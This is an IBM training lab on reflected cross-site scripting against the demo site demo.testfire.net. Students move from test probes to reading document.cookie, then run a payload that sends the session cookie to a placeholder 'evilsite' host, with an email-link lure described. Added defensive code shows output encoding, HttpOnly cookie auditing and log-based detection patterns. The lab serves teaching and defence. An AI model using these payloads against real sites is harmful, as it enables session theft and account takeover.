Lab 2: Steal the User Cookie


In the training material we talked about how a Cross Site Scripting attack can be used to gain access to
sensitive information such as user session cookies. In this lab we will use a script to get access to your
cookies and discuss how this concept could be used to retrieve other users' cookies.


First we are going to show that the application is susceptible to cross site scripting, then launch a script to
get access to your cookies for the current session, and finally discuss how we can inject a script into a
user's browser, without their knowledge, to retrieve their cookies.


In this lab you will play the role of a malicious user. 


Lab Overview

• 2.1 Determine the best attack method
  a. How do I force the client to run my commands?
  b. What language are almost all computers able to execute?

• 2.2 Find the application vulnerability
  a. Where might I be able to include content within an application?
  b. What does the payload look like?
  c. How do I access the client cookie?

• 2.3 Exploit
  a. Discussion Topic
     i. How do I send this cookie from the victim to the attacker?
1.1 Determine the best attack method


__1. Launch Mozilla Firefox (there is a shortcut on the desktop)

[Screenshot: Mozilla Firefox desktop shortcut]
__2. Go to http://demo.testfire.net


__3. Enter the search string Super Bowl in the text box and select the Go button





__4. Review Return Results

[Screenshot: Search Results page reading "No results were found for the query: Super Bowl"]

Return Results


This is how a hacker will profile the site to try and learn how the
user interacts with the application and how the application reacts
to the user input.

We learn that the search string is reflected on the page: in this case
we see Super Bowl, which is what we typed in the search box.


Page 2 Lab 2 — Steal Cookie 
© 2007 IBM Corporation 




2.1 Find the application vulnerability 


__1. Now enter the following into the search string: <B>Super Bowl</B> in the text box, and select the
Go button

[Screenshot: Search box containing <B>Super Bowl</B>]

<B></B> are the HTML tags which tell the browser to render the
enclosed string in BOLD.


__2. Review Return Results

[Screenshot: Search Results page reading "No results were found for the query: Super Bowl", with Super Bowl rendered in bold]

Return Results


If the application renders <B>Super Bowl</B> as is, the
application is NOT susceptible to Cross-Site Scripting, since it
has neutralized the HTML meta characters so that they are
properly displayed just as the user input them.

If we see only Super Bowl rendered in bold, then we know that
the application is not properly handling the HTML tags entered,
since the application echoed them back as is, without encoding
them appropriately.

Since we see Super Bowl in bold, we know that the browser has
executed the tags, as opposed to displaying them. Now the
hacker can try a more complex
__3. Enter in a more complex search: a test script


__a. In the search text box type in <script>alert(1)</script> and select the Go button

[Screenshot: browser alert dialog]

Return Results

We learn that the output is not encoded and the script tag is
executed by the browser.


__c. Click the OK button to close the cookie information 


__4. Use the same approach but access your cookie 


__a. In the search text box type in <script>alert(document.cookie)</script> and select the Go
Button

__b. Review Return Results

[Screenshot: alert dialog "The page at http://demo.testfire.net says:" listing the amUserInfo and amSessionId cookies]

Return Results

We learn that the cookie is available to the JavaScript.

**Note: your cookie data may have a different value than the
above screen shot.


__c. Click OK button to close message 
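The two findings of this section (the search string is echoed without encoding, and the cookie is readable from JavaScript) each have a standard fix. The block below is an added example written for this page, not code from the IBM lab or from demo.testfire.net: it renders the "No results were found" line the way the lab observes it (unencoded) and the way a fixed application would (HTML-encoded, so <B> and <script> are displayed rather than interpreted), and it audits a Set-Cookie header for the HttpOnly flag, which is what keeps a cookie out of document.cookie. The function names, the page template and the cookie value are assumptions; the cookie name amSessionId is modelled on the cookie shown in the alert above.

```javascript
// Added example for this lab page; not code from the IBM lab or from
// demo.testfire.net. Function names, the page template and the cookie
// value are assumptions made for the example.

// Encode the HTML meta characters that let input leave text context.
// This is the "neutralizing" the lab describes: the browser then shows
// <B> and <script> as text instead of interpreting them.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the search string is concatenated into the
// markup unchanged, which is the behaviour the lab observes.
function renderResultsVulnerable(query) {
  return "<p>No results were found for the query: " + query + "</p>";
}

// Fixed rendering: same page, encoded search string.
function renderResultsEncoded(query) {
  return "<p>No results were found for the query: " + escapeHtml(query) + "</p>";
}

// True when the HTML contains an actual start tag with this name,
// case-insensitively; "&lt;script&gt;" does not count.
function containsTag(html, tagName) {
  return new RegExp("<\\s*" + tagName + "[\\s>/]", "i").test(html);
}

// Audit one Set-Cookie header value. HttpOnly keeps the cookie out of
// document.cookie, so the alert(document.cookie) step would not show it;
// Secure keeps it off plaintext HTTP.
function auditSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const name = parts[0].split("=")[0];
  const attrs = parts.slice(1).map((p) => p.split("=")[0].toLowerCase());
  const httpOnly = attrs.includes("httponly");
  return { name, httpOnly, secure: attrs.includes("secure"), readableByScript: !httpOnly };
}

// Constructed inputs: the three strings the lab types into the search box,
// and two Set-Cookie headers modelled on the amSessionId cookie the alert
// shows (the value is made up).
const LAB_QUERIES = [
  "<B>Super Bowl</B>",
  "<script>alert(1)</script>",
  "<script>alert(document.cookie)</script>",
];
const SET_COOKIE_WEAK = "amSessionId=EXAMPLE_SESSION_VALUE; Path=/";
const SET_COOKIE_HARDENED = "amSessionId=EXAMPLE_SESSION_VALUE; Path=/; HttpOnly; Secure";

// For each lab query: does a script tag reach the browser with and without encoding?
function summarize() {
  return LAB_QUERIES.map((q) => ({
    query: q,
    scriptRunsWhenUnencoded: containsTag(renderResultsVulnerable(q), "script"),
    scriptRunsWhenEncoded: containsTag(renderResultsEncoded(q), "script"),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const q of LAB_QUERIES) {
    console.log("unencoded:", renderResultsVulnerable(q));
    console.log("encoded:  ", renderResultsEncoded(q));
  }
  console.log(auditSetCookie(SET_COOKIE_WEAK), auditSetCookie(SET_COOKIE_HARDENED));
}
```

Running it with node prints the two renderings for each query; the encoded form never contains a real tag, and only the hardened Set-Cookie header reports httpOnly: true. Encoding must be applied at the point the value is written into HTML (a template or a view helper), not once at input time, since the same value may later be written into a different context.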
2.2 Exploit


__1. Exploit the Cookie Information

- Social Engineering
  Can we entice the user to click on a link in an email we send
  them?


__a. From the Mozilla Firefox menu, choose Tools -> Tamper Data to launch the Tamper Data
plug-in

[Screenshot: Firefox Tools menu (Error Console, Page Info, Clear Private Data... Ctrl+Shift+Delete, Tamper Data) and the Tamper Data window with Start Tamper, Stop Tamper and Clear buttons and an Ongoing requests list]

The Tamper Data utility will open.
__b. Return to Mozilla Firefox and in the search text box type in <script>document.write('<img
src=http://evilsite/'+document.cookie);</script> and select the Go button

The above JavaScript, once it is injected into the search parameter,
will be echoed back to the browser and executed. This will result
in a URL request via the image tag; however, the request will
actually send a request to evilsite with your cookie appended to it.


__c. Review Results

[Screenshot: Search Results page reading "No results were found for the query:"]

__d. Go to the Tamper Data GUI and locate and highlight the request you just made to evilsite.
Do you see your cookie(s) being sent to it?


[Screenshot: Tamper Data window listing the requests to demo.testfire.net and the request to evilsite, with the selected request's headers shown in the request header panel]





One way of exploiting this vulnerability is to send an email to the
targeted user with a link with the above script embedded in it. If
the user clicks on it, the request will be sent to the web
application, demo.testfire.net, with the script as input for the
search box. When the script is echoed back by the application, it
will be executed by the browser and the user's cookies will be sent
to the evilsite application.


__e. Close the Tamper Data utility


__f. Close the Firefox browser
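The email-link scenario above ends with the victim's browser sending the script to demo.testfire.net as the search parameter, which means the web server's access log records every such request. The block below is an added example written for this page, not code from the IBM lab or from the demo site: it parses combined-format access log lines, percent-decodes each query parameter, and flags the values that contain an HTML tag, a script tag, or a read of document.cookie, which are the three probes typed into the search box during this lab. The log lines are constructed; the addresses, timestamps and the /search path are made up.

```javascript
// Added example for this lab page; not code from the IBM lab or from
// demo.testfire.net. The /search path, addresses and timestamps in the
// sample log are made up for the example.

// Detection rules in rising severity: any HTML tag, a script tag, and a
// read of document.cookie in a decoded query parameter.
const RULES = [
  { name: "html_tag", re: /<\s*[a-z][a-z0-9]*[\s>\/]/i },
  { name: "script_tag", re: /<\s*script\b/i },
  { name: "document_cookie", re: /document\s*\.\s*cookie/i },
];

// Apache/NCSA combined log format: ip ident user [time] "method target proto" status size "referer" "agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Percent-decode one query value; '+' is a space in form-encoded queries.
// A malformed escape is left as-is rather than dropped, so a broken
// encoding cannot hide a payload from the rules.
function decodeParam(v) {
  try {
    return decodeURIComponent(v.replace(/\+/g, " "));
  } catch (e) {
    return v;
  }
}

// Parse one log line into its fields and decoded query parameters.
function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null;
  const [, ip, time, method, target, status, referer, agent] = m;
  const qIndex = target.indexOf("?");
  const path = qIndex === -1 ? target : target.slice(0, qIndex);
  const params = {};
  if (qIndex !== -1) {
    for (const pair of target.slice(qIndex + 1).split("&")) {
      if (!pair) continue;
      const eq = pair.indexOf("=");
      const k = decodeParam(eq === -1 ? pair : pair.slice(0, eq));
      const v = eq === -1 ? "" : decodeParam(pair.slice(eq + 1));
      params[k] = v;
    }
  }
  return { ip, time, method, path, params, status: Number(status), referer, agent };
}

// One finding per parameter that trips at least one rule.
function findXssProbes(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    for (const [param, value] of Object.entries(req.params)) {
      const rules = RULES.filter((r) => r.re.test(value)).map((r) => r.name);
      if (rules.length) findings.push({ ip: req.ip, time: req.time, path: req.path, param, value, rules });
    }
  }
  return findings;
}

// Constructed sample lines; the query values are the strings typed into the
// search box in this lab, as a browser would URL-encode them.
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Jan/2007:12:00:01 +0000] "GET /search?query=Super+Bowl HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [10/Jan/2007:12:00:09 +0000] "GET /search?query=%3CB%3ESuper+Bowl%3C%2FB%3E HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [10/Jan/2007:12:00:20 +0000] "GET /search?query=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 1851 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [10/Jan/2007:12:00:31 +0000] "GET /search?query=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 1870 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [10/Jan/2007:12:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];

if (typeof require !== "undefined" && require.main === module) {
  for (const f of findXssProbes(SAMPLE_LOG)) {
    console.log(`${f.time} ${f.ip} ${f.path} ${f.param}=${JSON.stringify(f.value)} -> ${f.rules.join(",")}`);
  }
}
```

The plain "Super Bowl" search and the request with no query string produce no finding; the bold-tag probe trips only html_tag, while the two script probes trip script_tag as well, and the last one also trips document_cookie. Decoding before matching matters because the payload arrives percent-encoded, and matching after decoding is what lets a single rule catch both the raw and the encoded form.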